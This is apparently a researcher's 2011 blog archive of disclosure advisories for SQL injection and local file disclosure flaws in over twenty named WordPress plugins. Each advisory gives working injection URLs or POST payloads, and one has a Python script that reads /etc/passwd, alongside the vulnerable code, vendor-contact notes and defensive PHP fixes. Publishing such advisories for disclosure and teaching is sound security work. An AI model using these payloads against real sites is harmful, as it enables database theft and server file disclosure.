Wednesday, August 31, 2011

WordPress Couponer plugin <= 1.2 SQL Injection Vulnerability

# Exploit Title: WordPress Couponer plugin <= 1.2 SQL Injection Vulnerability
# Date: 2011-08-31
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/couponer.zip
# Version: 1.2 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/couponer/print-coupon.php?ID=-1' UNION ALL SELECT 1,version(),database(),current_user(),5,6,7,8,9,10--%20

---------------
Vulnerable code
---------------
$ID = $_GET['ID'];
...
$sql_get_coupon_id = "SELECT *, DATE_FORMAT(Expires, '%b %e, %Y') as Expires, DATE_FORMAT(Created, '%b %e, %Y') as Created FROM wp_couponer WHERE ID='$ID'";
$result_get_coupon_id = mysql_query($sql_get_coupon_id);
p.s. author has been contacted (no reply yet)

WordPress PureHTML plugin <= 1.0.0 SQL Injection Vulnerability

# Exploit Title: WordPress PureHTML plugin <= 1.0.0 SQL Injection Vulnerability
# Date: 2011-08-31
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip
# Version: 1.0.0 (tested)
# Note: magic_quotes has to be turned off

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/pure-html/alter.php
 PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
if(!isset($_POST['PureHTMLNOnce'])){
    if ( !wp_verify_nonce( $_POST['PureHTMLNOnce'], plugin_basename(__FILE__) )) {header("location:".$refer);}
}
else{
    ...
    if(isset($_POST['id'])){$id = $_POST['id'];}else{$id='0';}
    ...
    $action = $_POST['action'];
    
    #delete
    if($action == "delete"){
        $sql = "delete from ".$wpdb->prefix."pureHTML_functions WHERE id='".$id."'";
        $wpdb->query($wpdb->prepare($sql)); //misusage of $wpdb->prepare() :)
p.s. author has been contacted (no reply yet)

WordPress yolink Search plugin <= 1.1.4 SQL Injection Vulnerability

# Exploit Title: WordPress yolink Search plugin <= 1.1.4 SQL Injection Vulnerability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/yolink-search.1.1.4.zip
# Version: 1.1.4 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/yolink-search/includes/bulkcrawl.php
 page=-1&from_id=-1 UNION ALL SELECT CONCAT_WS(CHAR(58),database(),version(),current_user()),NULL--%20&batch_size=-1

---------------
Vulnerable code
---------------
$post_type_in = array();

if( isset( $_POST['page'] ) )
{
    $post_type_in[] = '"page"';
}
if( isset( $_POST['post'] ) )
{
    $post_type_in[] = '"post"';
}
$post_type_in = '(' . implode(',', $post_type_in) . ')';
$id_from = $_POST['from_id'];
$batch_size = $_POST['batch_size'];

$post_recs = $wpdb->get_results( $wpdb->prepare( "SELECT ID,GUID FROM $wpdb->posts WHERE post_status='publish' AND post_type IN $post_type_in AND ID > $id_from order by ID asc LIMIT $batch_size" ) ); //misusage of $wpdb->prepare() :)
p.s. author has been contacted (will fix it)
p.p.s. for proper usage of $wpdb->prepare() you can take a look here

Tuesday, August 30, 2011

WordPress wp audio gallery playlist plugin <= 0.12 SQL Injection Vulnerability

# Exploit Title: WordPress wp audio gallery playlist plugin <= 0.12 SQL Injection Vulnerability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-audio-gallery-playlist.0.12.zip
# Version: 0.12 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/wp-audio-gallery-playlist/playlist.php?post_gallery=-1' UNION ALL SELECT 1,2,3,4,5,database(),current_user(),8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22,23--%20

---------------
Vulnerable code
---------------
$table_name = $wpdb->prefix . "posts";
...
if (isset($_GET['post_gallery']))
    $query = 'SELECT * FROM `'.$table_name.'` WHERE `post_parent` = \''.$_GET['post_gallery'].'\' AND  `post_mime_type` = \'audio/mpeg\' ORDER BY `menu_order` ASC';
p.s. author has been contacted (no reply yet)

WordPress Crawl Rate Tracker plugin <= 2.0.2 SQL Injection Vulnerability

# Exploit Title: WordPress Crawl Rate Tracker plugin <= 2.0.2 SQL Injection Vulnerability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/crawlrate-tracker.2.02.zip
# Version: 2.0.2 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/crawlrate-tracker/sbtracking-chart-data.php?chart_data=1&page_url=-1' AND EXTRACTVALUE(1, CONCAT(CHAR(58),@@version,CHAR(58)))--%20

---------------
Vulnerable code
---------------
class b3_chartData extends b3_sbTrackingConfig
{
    public function tracking_bot_report_chart_data()
    {
        ...
        if($_GET['page_url'] != '')
        {
            $bots = $this->wpdb->get_results("SELECT DATE(FROM_UNIXTIME(`visit_time`)) `visit_date`,`robot_name`,COUNT(*) `total` FROM $this->sbtracking_table WHERE `visit_time` >= '$start' AND `visit_time` <= '$end' AND `page_url` = '" . $_GET['page_url'] . "' GROUP BY `visit_date`,`robot_name`");
            ...

if ($_GET['chart_data']==1) {
    ...
    $chartData = new b3_chartData();
    echo $chartData->tracking_bot_report_chart_data();
p.s. author has been contacted (will fix it)

WordPress Event Registration plugin <= 5.4.3 SQL Injection Vulnerability

# Exploit Title: WordPress Event Registration plugin <= 5.4.3 SQL Injection Vulnerability
# Date: 2011-08-30
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/event-registration.5.43.zip
# Version: 5.4.3 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/event-registration/event_registration_export.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
$id= $_REQUEST['id'];
...
$sql  = "SELECT * FROM " . $events_detail_tbl . " WHERE id='$id'";
$result = mysql_query($sql);
p.s. author has been contacted (no reply yet)

WordPress Advertizer plugin <= 1.0 SQL Injection Vulnerability

# Exploit Title: WordPress Advertizer plugin <= 1.0 SQL Injection Vulnerability
# Date: 2011-08-29
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/advertizer.1.0.zip
# Version: 1.0 (tested)
# Note: magic_quotes has to be turned off

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/advertizer/click_ads.php
 id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
$res = $wpdb->get_row("SELECT `limit_clicks`, `trace_clicks` FROM `".$wpdb->prefix."adv_v_base` WHERE `id` = '".$_POST[id]."' limit 1;");
p.s. author has not been contacted (no usable contact information about the author)

Monday, August 29, 2011

WordPress SH Slideshow plugin <= 3.1.4 SQL Injection Vulnerability

# Exploit Title: WordPress SH Slideshow plugin <= 3.1.4 SQL Injection Vulnerability
# Date: 2011-08-29
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/sh-slideshow.3.1.4.zip
# Version: 3.1.4 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/sh-slideshow/ajax.php
 id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
$result = $wpdb->query('delete from sh_slides where id = '.$_POST['id']);
p.s. can't contact the author as there is no contact information available (samhoamt)

WordPress iCopyright(R) Article Tools plugin <= 1.1.4 SQL Injection Vulnerability

# Exploit Title: WordPress iCopyright(R) Article Tools plugin <= 1.1.4 SQL Injection Vulnerability
# Date: 2011-08-29
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/copyright-licensing-tools.zip
# Version: 1.1.4 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/copyright-licensing-tools/icopyright_xml.php?id=1' AND 1=1--%20

---------------
Vulnerable code
---------------
$icopyright_post_id = $_GET['id']; //requested post id
...
$response = $wpdb->get_results("SELECT * FROM $posttable JOIN $usertable on $posttable.post_author=$usertable.ID WHERE $posttable.ID = '$icopyright_post_id'");

p.s. author has been contacted (they'll fix it)

Sunday, August 28, 2011

WordPress Facebook Promotions plugin <= 1.3.3 SQL Injection Vulnerability

# Exploit Title: WordPress Facebook Promotions plugin <= 1.3.3 SQL Injection Vulnerability
# Date: 2011-08-28
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/fbpromotions.1.3.3.zip
# Version: 1.3.3 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/fbpromotions/fbActivate.php?action=activate&name=test&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
if($_REQUEST['action']=="activate"){
    $key = md5(get_option("key").$_REQUEST['name'].$_REQUEST['id']);
    ...
    $sql = "UPDATE fb_promotions SET `landing_order`=1,`activation_key`='".$key."' WHERE promo_id='".$_REQUEST['id']."'";
p.s. author has been contacted (no reply yet)

WordPress Evarisk plugin <= 5.1.3.6 SQL Injection Vulnerability

# Exploit Title: WordPress Evarisk plugin <= 5.1.3.6 SQL Injection Vulnerability
# Date: 2011-08-28
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/evarisk.5.1.3.6.zip
# Version: 5.1.3.6 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/evarisk/include/ajax.php?post=true&act=reloadCombo&table=wp_eva__veille_groupe_question&nomRacine=-1" UNION ALL SELECT 1,@@version,3,4,5,6,7--%20

---------------
Vulnerable code
---------------
if($_REQUEST['post'] == 'true')
{
    if(isset($_REQUEST['act']))
    {
        switch($_REQUEST['act'])
        {
            ...
            case 'reloadCombo':
                $racine = $wpdb->get_row( 'SELECT * FROM ' . TABLE_GROUPE_QUESTION . ' where nom="' . $_REQUEST['nomRacine'] . '"');
p.s. author has been contacted (no reply yet)

WordPress Profiles plugin <= 2.0 RC1 SQL Injection Vulnerability

# Exploit Title: WordPress Profiles plugin <= 2.0 RC1 SQL Injection Vulnerability
# Date: 2011-08-28
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/profiles.2.0.RC1.zip
# Version: 2.0 RC1 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/profiles/library/bio-img.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
$query = "SELECT * FROM ".$wpdb->prefix."bios WHERE id='$_GET[id]'";
...
$result = mysql_query($query);
p.s. author has been contacted (no reply yet)

WordPress mySTAT plugin <= 2.6 SQL Injection Vulnerability

# Exploit Title: WordPress mySTAT plugin <= 2.6 SQL Injection Vulnerability
# Date: 2011-08-28
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/mystat.2.6.zip
# Version: 2.6 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/mystat/mystat.php?act=stat_img&d1=1&d2=-1') AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
if(isset($_GET['act'])){
    ...
    if ($_GET['act'] == 'stat_img') {
        myStat_stat_image();
        exit();
    };
};

function myStat_stat_image(){
    ...
    if(substr($_GET['d1'],0,10)!=substr($_GET['d2'],0,10)){
        $var=$cmn->getSQL("SELECT DATE_FORMAT(date,'%d-%m-%y'),count(*),sum(count),TO_DAYS(date) FROM `%%PREFIX%%myStat_main` WHERE date > ('".$_GET['d1']."') AND date < ('".$_GET['d2']."') GROUP BY TO_DAYS(date) ORDER BY date DESC LIMIT 0,30;");
p.s. won't contact Secunia as they aren't replying to my previous emails; can't contact the author as there is no contact information at all (KILLER)

Saturday, August 27, 2011

WordPress Collision Testimonials plugin <= 3.0 SQL Injection Vulnerability

# Exploit Title: WordPress Collision Testimonials plugin <= 3.0 SQL Injection Vulnerability
# Date: 2011-08-26
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/collision-testimonials.zip
# Version: 3.0 (tested)
# Note: user has to be logged in as "admin"

---
PoC
---
http://www.site.com/wp-admin/admin.php?page=testimonials&featQuote&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
if (isset($_GET['featQuote'])) {
    $id = $_GET['id'];
    mysql_query("UPDATE $testimonials SET featured=1 WHERE id=$id");
};
p.s. contacted Secunia (no reply); contacted the author, who was quite rude, saying that he'll just discontinue the plugin itself

WordPress oQey Headers plugin <= 0.3 SQL Injection Vulnerability

# Exploit Title: WordPress oQey Headers plugin <= 0.3 SQL Injection Vulnerability
# Date: 2011-08-26
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/oqey-headers.0.3.zip
# Version: 0.3 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/oqey-headers/oqey_settings.php?img_header_id[]=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
if(isset($_GET['img_header_id'])){//order images
foreach ($_GET['img_header_id'] as $position => $item){
$h_update = sprintf("UPDATE $oqey_header SET oqey_h_order = '%d' WHERE oqey_h_id = '%s' ", $position,  $item);
...
p.s. contacted Secunia (no reply), contacted author (fixed)

WordPress Js-appointment plugin <= 1.5 SQL Injection Vulnerability

# Exploit Title: WordPress Js-appointment plugin <= 1.5 SQL Injection Vulnerability
# Date: 2011-08-26
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/js-appointment.1.5.zip
# Version: 1.5 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/js-appointment/searchdata.php?search_action=searchadv&cat=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
if (!empty($_REQUEST['search_action'])) {
    switch($_REQUEST['search_action']) {
        case 'searchadv':
    require_once(PLUGIN_PATH_ALLBOOK."/libs/class.book.php");
    $settings = allbook_get_settings();

    if ($_REQUEST["cat"]) {
    $category = $_REQUEST["cat"];
    } else {
    $settings = allbook_get_settings();
    $category = $settings['allbook_catinit'];
      }
    //$times = create_time_range($settings['allbook_datastart'], $settings['allbook_dataend'], $settings['allbook_datarange']);
   $categoryquery = mysql_query("SELECT * FROM wp_resservation_cat WHERE id= '".$category."'");
   $rowcategory = mysql_fetch_array( $categoryquery );
...
p.s. contacted Secunia (no reply), contacted author (no reply)

WordPress Super CAPTCHA plugin <= 2.2.4 SQL Injection Vulnerability

# Exploit Title: WordPress Super CAPTCHA plugin <= 2.2.4 SQL Injection Vulnerability
# Date: 2011-08-26
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/super-capcha.2.2.4.zip
# Version: 2.2.4 (tested)
# Notes: user has to be logged in as "admin" and magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-admin/admin.php?page=super-captcha/Logs&markspam=-1' OR SLEEP(5)--%20

---------------
Vulnerable code
---------------
if(isset($_REQUEST['markspam']))
{
    global $wpdb;
    $UIDs = explode(',', $_REQUEST['markspam']);
    echo('<h2>Accounts Flagged</h2>');
    for($i=0;$i<count($UIDs);$i++)
    {
        mysql_query("UPDATE `". $wpdb->users ."` SET `spam`='1' WHERE `ID`='". $UIDs[$i] ."'");
        mysql_query("UPDATE `". $wpdb->users ."` SET `user_status`='1' WHERE `ID`='". $UIDs[$i] ."'");
        echo('<em>USER ID: '. $UIDs[$i] .' marked as spammer.</em><br />');
    }
}
p.s. contacted Secunia (no reply), no known contact information about the author (leewells)

WordPress MM Forms Community plugin <= 1.2.3 SQL Injection Vulnerability

# Exploit Title: WordPress MM Forms Community plugin <= 1.2.3 SQL Injection Vulnerability
# Date: 2011-08-26
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/mm-forms-community.zip
# Version: 1.2.3 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/mm-forms-community/includes/edit_details.php?ID=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
foreach ($_REQUEST as $key => $value){
    
    $SQL="UPDATE wp_contactform_submit_data SET value=".quoteString($value)." WHERE fk_form_joiner_id='".$_REQUEST['ID']."' AND form_key='".$key."'";
    mysql_query($SQL);
}
p.s. contacted Secunia yesterday (no reply), can't find any contact information about the author (tbelmans)

Monday, August 22, 2011

Making the Web a safer place to be :)

Guess who is responsible for those updates? I'll give you a hint ;)

WordPress MM Duplicate plugin <= 1.2 SQL Injection Vulnerability

# Exploit Title: WordPress MM Duplicate plugin <= 1.2 SQL Injection Vulnerability
# Date: 2011-08-22
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/mm-duplicate.zip
# Version: 1.2 (tested)

---
PoC
---
http://www.site.com/index.php?duplicate=1&post=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
class mm_duplicate_pages_posts
{
    ...
    function mm_duplicate_pages_posts()
    {
        ...
        add_action('init', array(&$this, 'dup'));
        ...        
    }

    function dup()
    {
        if($_GET['duplicate'])
        {
            $id = $_GET['post'];
            $dup = new mm_duplicate();
            ...
            $dup->duplicate_post_page($id);
        }
    }
...
}

class mm_duplicate
{
    function duplicate_post_page($id)
    {
        ...
        $select = "select * from ".$wpdb->prefix."postmeta where post_id = $id";
        ...
    }
...
}
p.s. author has been contacted (no reply yet)

Saturday, August 20, 2011

WordPress UnGallery plugin <= 1.5.8 Local File Disclosure Vulnerability

# Exploit Title: WordPress UnGallery plugin <= 1.5.8 Local File Disclosure Vulnerability
# Date: 2011-08-20
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/ungallery.1.5.8.zip
# Version: 1.5.8 (tested)

---
PoC
---
#!/usr/bin/env python
# Python 2 PoC (urllib2): the 'pic' parameter is passed straight to readfile(),
# so a traversal sequence reads any file the web server user can open.

import urllib2

FILEPATH = "/etc/passwd"

req = urllib2.urlopen("http://www.site.com/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../../../..%s" % FILEPATH)

print "Filepath: '%s'" % FILEPATH
print "Content: %s" % repr(req.read())

---------------
Vulnerable code
---------------
if ($_GET['pic']) {
    $filename = $_GET['pic'];
    $len = filesize($filename);
    $lastslash =  strrpos($filename, "/");
    $name =  substr($filename, $lastslash + 1);   

    header("Content-type: image/jpeg;\r\n");
    header("Content-Length: $len;\r\n");
    header("Content-Transfer-Encoding: binary;\r\n");
    header('Content-Disposition: inline; filename="'.$name.'"');    //  Render the photo inline.
    readfile($filename);
}
p.s. author has been contacted (no reply yet)
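For comparison, here is the containment check a handler like the one above needs, as an added example (not the plugin's code and not from the post): resolve the requested name against a fixed base directory and serve the file only if the resolved path is still inside that directory. `$GALLERY_DIR` is a hypothetical upload directory; the rest is plain PHP and needs no WordPress.

```php
<?php
// Added example, not the UnGallery plugin's code. $GALLERY_DIR is a
// hypothetical image directory; everything else is stock PHP.

/**
 * Resolve $requested against $base and return the absolute path only if the
 * result is a regular file inside $base. Returns false for "../" traversal,
 * symlinks that point outside $base, NUL bytes and missing files.
 */
function contained_path( $base, $requested ) {
    $base = realpath( $base );
    if ( $base === false ) {
        return false;
    }
    // A NUL byte truncates the path in the underlying C calls; reject it.
    if ( strpos( $requested, "\0" ) !== false ) {
        return false;
    }
    // realpath() collapses every "../" and follows symlinks, so the check
    // below sees the directory the file really lives in.
    $full = realpath( $base . DIRECTORY_SEPARATOR . $requested );
    if ( $full === false || ! is_file( $full ) ) {
        return false;
    }
    // Compare against the base WITH a trailing separator, otherwise
    // "/srv/images2/x" would pass as being under "/srv/images".
    $prefix = rtrim( $base, DIRECTORY_SEPARATOR ) . DIRECTORY_SEPARATOR;
    return strncmp( $full, $prefix, strlen( $prefix ) ) === 0 ? $full : false;
}

$GALLERY_DIR = __DIR__ . '/images'; // hypothetical

if ( isset( $_GET['pic'] ) ) {
    $filename = contained_path( $GALLERY_DIR, $_GET['pic'] );
    if ( $filename === false ) {
        // "../../../../etc/passwd" resolves to /etc/passwd, fails the prefix
        // test and ends here instead of in readfile().
        header( 'HTTP/1.1 404 Not Found' );
        exit;
    }
    header( 'Content-Type: image/jpeg' );
    header( 'Content-Length: ' . filesize( $filename ) );
    header( 'Content-Disposition: inline; filename="' . basename( $filename ) . '"' );
    readfile( $filename );
}
```

The prefix comparison is done on the realpath() output, not on the user-supplied string, so encoded or doubled-up traversal sequences and symlinks are all judged by where the file actually is.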

Best quick & dirty tip for preventing SQLi in Wordpress plugins

After a code review of lots of WordPress plugins (here), the best quick and dirty tip I can give (nothing new; lots of plugin writers already use it) if you write WordPress plugins and are too stubborn to use prepared statements is this:

Enclose every parameter value inside your hand-crafted SQL queries in single quotes (e.g. ...WHERE id='$id'...). Yes, that explicitly includes integer-type parameter values (non-standard, but effective against SQLi in WordPress).

Why? As stated here, and as I've lately seen many times in code reviews, WordPress > v3.0 slashes request data itself during bootstrap (wp_magic_quotes(), e.g. $_GET = add_magic_quotes($_GET)), whatever PHP's own magic_quotes_gpc setting is. Every quote in a parameter therefore arrives as \', so breaking out of a quoted value ('...') into valid SQL becomes mission impossible for the attacker, except in some multi-byte character encodings such as GBK (example), where the byte before the inserted backslash swallows it into a two-byte character and leaves the quote bare. You can safely enclose integer values in single quotes because MySQL casts the string to the required type (e.g. integer) automatically. The tip only helps where SQL accepts a quoted literal: a LIMIT operand (see the yolink Search advisory above), an ORDER BY column or a table name cannot be quoted and need intval() or a whitelist instead.

For example, the simple transformation from (vulnerable):
... = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."plugin WHERE id=".$id)
to:
... = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."plugin WHERE id='".$id."'")
or just:
... = $wpdb->get_row("SELECT * FROM ".$wpdb->prefix."plugin WHERE id='$id'")
makes your plugin far safer from attackers (unless your WordPress installation uses the "simplified Chinese" GBK character encoding).

Non-SELECT statements (INSERT, UPDATE, ...) are just as susceptible to SQL injection, so the tip applies to those too. I've seen a few cases where it seemed to me that authors knowingly left them unprotected, as if nobody would be able to use them. In the worst case (!) those are still exploitable blind, by timing (the BENCHMARK() payloads above), and a keen attacker will use them for sure.


p.s. update: I've started disclosing those "careless" WP plugins too, so either start using prepared SQL statements or do your filtering yourself
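To make the difference concrete, here are the three patterns side by side as an added example in PHP (not code from the post or from any of the plugins above): the `$wpdb->prepare()` misuse flagged in the PureHTML, yolink Search and Allow PHP in Posts advisories, the intended placeholder form, and the quoted-and-escaped fallback from the tip. It assumes it runs inside WordPress, where `$wpdb` is loaded, and a hypothetical table `{$wpdb->prefix}plugin` with an integer `id` and a string `name` column; `$wpdb->prepare()`, `esc_sql()` and `stripslashes()` are real WordPress/PHP functions.

```php
<?php
// Added example, not from the post or any plugin above. Assumes WordPress is
// loaded (global $wpdb) and a hypothetical table {$wpdb->prefix}plugin with
// an integer `id` and a string `name` column.

// Pattern 1, the "misusage of $wpdb->prepare()" seen above: the value is
// concatenated BEFORE prepare() sees the query. No placeholder is left, so
// prepare() escapes nothing and this is identical to get_row( $sql ).
function plugin_row_misused( $id ) {
    global $wpdb;
    $sql = "SELECT * FROM {$wpdb->prefix}plugin WHERE id = " . $id;
    return $wpdb->get_row( $wpdb->prepare( $sql ) );
    // id "-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5('sqlmap')),0)" runs as written
}

// Pattern 2, the intended use: placeholders in the query, values as extra
// arguments. %d is passed through vsprintf() and becomes an integer; %s is
// escaped AND quoted by prepare() itself, so do not put quotes around %s.
function plugin_row_by_id( $id ) {
    global $wpdb;
    return $wpdb->get_row( $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}plugin WHERE id = %d",
        $id
    ) );
    // the payload above collapses to:  ... WHERE id = -1
}

function plugin_row_by_name( $name ) {
    global $wpdb;
    return $wpdb->get_row( $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}plugin WHERE name = %s",
        $name
    ) );
    // name "x' OR 1=1-- " becomes:  ... WHERE name = 'x\' OR 1=1-- '
}

// Pattern 3, the quick-and-dirty tip made explicit: quote the value AND
// escape it yourself with esc_sql() instead of trusting that
// add_magic_quotes() already slashed it. Request data WordPress slashed is
// unslashed first; double escaping cannot break out, but stores "\\'" as data.
function plugin_row_quoted( $id ) {
    global $wpdb;
    $id = esc_sql( stripslashes( $id ) );
    return $wpdb->get_row( "SELECT * FROM {$wpdb->prefix}plugin WHERE id = '{$id}'" );
    // '-1 AND 1=IF(...)' is now a string literal MySQL casts to -1;
    // a quote inside it arrives as \' and cannot close the literal
}

// Where no quoted literal is allowed (LIMIT, ORDER BY), quoting is no help;
// cast or whitelist instead. LIMIT '5' is a MySQL syntax error.
function plugin_rows_page( $batch_size ) {
    global $wpdb;
    $batch_size = max( 1, intval( $batch_size ) );
    return $wpdb->get_results( "SELECT * FROM {$wpdb->prefix}plugin ORDER BY id ASC LIMIT {$batch_size}" );
}

// Handler using the placeholder form on an attacker-controlled parameter.
$row = plugin_row_by_id( isset( $_GET['id'] ) ? $_GET['id'] : 0 );
```

The test for whether prepare() is doing anything is simple: if the query string passed to it contains no `%d`, `%s` or `%f`, the call is decorative and the values reached the string some other way.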

Thursday, August 18, 2011

WordPress Menu Creator plugin <= 1.1.7 SQL Injection Vulnerability

# Exploit Title: WordPress Menu Creator plugin <= 1.1.7 SQL Injection Vulnerability
# Date: 2011-08-18
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-menu-creator.1.1.7.zip
# Version: 1.1.7 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/wp-menu-creator/updateSortOrder.php?menu_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
$menu_id = $_GET['menu_id'];
...
$first_item = $wpdb->get_row("SELECT * FROM " . $wpdb->prefix."menuitems WHERE `order`=0 AND `parent`=0 AND menu = $menu_id");
p.s. author has been contacted (no reply yet)

WordPress Allow PHP in Posts and Pages plugin <= 2.0.0.RC1 SQL Injection Vulnerability

# Exploit Title: WordPress Allow PHP in Posts and Pages plugin <= 2.0.0.RC1 SQL Injection Vulnerability
# Date: 2011-08-18
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/allow-php-in-posts-and-pages.zip
# Version: 2.0.0.RC1 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/allow-php-in-posts-and-pages/alter.php
 allowPHPNonce=-1&action=modify&function=-1&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
Vulnerable code
---------------
    if(!isset($_POST['allowPHPNonce'])){
        if ( !wp_verify_nonce( $_POST['allowPHPNonce'], plugin_basename(__FILE__) )) {header("location:".$refer);}
    }
    else{
        if(!isset($_POST['action']) || !defined ('ABSPATH')){header("location:".$refer);}
        if(isset($_POST['id'])){$id = $_POST['id'];}else{$id='0';}
        if(isset($_POST['function'])){$function = $_POST['function'];}else{$function="";}
        if(isset($_POST['name'])){$name = $_POST['name'];}else{$name="";}
        $action = $_POST['action'];

		#delete
        if($action == "delete"){

        ...

        elseif($action == "modify" && $function != ""){
            $sql = "update ".$wpdb->prefix."allowPHP_functions set function='".$function."', name='".$name."' where id = ".$id;
            $results = $wpdb->get_results($wpdb->prepare($sql));
p.s. author has been contacted (no reply yet)

WordPress Global Content Blocks plugin <= 1.2 SQL Injection Vulnerability

# Exploit Title: WordPress Global Content Blocks plugin <= 1.2 SQL Injection Vulnerability
# Date: 2011-08-18
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/global-content-blocks.1.2.zip
# Version: 1.2 (tested)

---
PoC
---
http://www.site.com/wp-content/plugins/global-content-blocks/gcb/gcb_export.php?gcb=1 AND 1=1

---------------
Vulnerable code
---------------
$ids = explode(";",$_GET["gcb"]);
$final_text = array();

foreach($ids as $id) {
    if(intval($id)>0) { // intval("1a") => 1 :)
        $entry = $wpdb->get_row("select * from ".$wpdb->prefix."gcb where id=".$id);
p.s. author has been contacted (fixed)

